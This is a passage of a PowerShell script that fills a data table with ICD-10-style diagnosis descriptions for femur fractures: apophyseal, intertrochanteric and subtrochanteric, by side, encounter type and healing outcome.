femur","Nondisplaced apophyseal fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of left femur","Nondisplaced apophyseal fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of unspecified femur","Nondisplaced apophyseal fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of right femur","Displaced intertrochanteric fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of left femur","Displaced intertrochanteric fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intertrochanteric fracture of unspecified femur","Displaced intertrochanteric fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of right femur","Nondisplaced intertrochanteric fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of left femur","Nondisplaced intertrochanteric fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intertrochanteric fracture of unspecified femur","Nondisplaced intertrochanteric fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of right femur","Displaced subtrochanteric fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of left femur","Displaced subtrochanteric fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified 